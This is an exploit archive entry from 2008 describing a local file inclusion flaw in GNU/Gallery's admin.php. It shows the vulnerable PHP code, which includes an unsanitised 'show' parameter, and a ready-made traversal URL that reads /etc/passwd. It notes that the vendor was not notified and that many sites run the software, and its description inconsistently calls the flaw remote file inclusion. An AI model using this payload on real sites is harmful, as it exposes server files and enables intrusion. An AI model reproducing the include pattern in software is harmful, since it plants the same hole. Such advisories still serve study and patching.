id: 3043
date: 05/17/2008
title: GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability
author: t0pP8uZz
cves: 

=====================================================================
GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability
=====================================================================



--==+================================================================================+==--
--==+	   GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability     +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 17 MAY 2008
Script Download: http://gnugallery.sourceforge.net/
DORK: N/A



Vendor Has Not Been Notified!



DESCRIPTION: 

GNU/Gallery suffers from a remote file inclusion vulnerability in the "admin.php" file.



Vulnerable Code:

<?php
if($_GET['show']=="") {
  include("admin/index.php");
} else {
  include("admin/".$_GET['show']);
}
?>



Vulnerability:

http://site.com/admin.php?show=../../../../../../../etc/passwd



NOTE/TIP: 

fair amount of sites running, althou no good dork.



#  0day.today [2023-03-22]  #